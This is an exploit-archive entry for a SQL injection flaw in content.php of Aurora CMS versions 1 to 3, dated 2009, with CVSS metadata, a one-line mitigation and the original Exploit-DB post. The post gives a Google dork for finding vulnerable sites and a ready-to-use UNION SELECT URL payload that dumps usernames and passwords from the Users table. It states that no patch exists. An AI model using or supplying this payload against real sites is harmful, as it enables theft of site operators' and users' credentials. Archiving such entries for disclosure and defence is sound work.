Aurora CMS Remote SQL Injection Exploit [content.php]

vendor:

Aurora CMS

by:

Sora

8.8

CVSS

HIGH

UNION statement SQL injection

CWE

Product Name: Aurora CMS

Affected Version From: 1

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:aurora_cms:aurora_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows and Linux

2009

Aurora CMS Remote SQL Injection Exploit [content.php]

Aurora CMS suffers a remote SQL injection exploit in content.php. The type is UNION statement SQL injection.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
# Date: December 22nd, 2009
# Author: Sora
# Software Link: http://www.auroracms.com.au/
# Version: 1.0, 2.0, and 3.0
# Tested on: Windows and Linux
------------------------------------------------
> Aurora CMS Remote SQL Injection Exploit
> Vulnerability in: content.php
> Found and disclosed by: Sora
> Contact: vhr95zw [at] hotmail.com

> Google dork: "Aurora CMS"

Aurora CMS suffers a remote SQL injection exploit in content.php.

The type is UNION statement SQL injection.

# Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!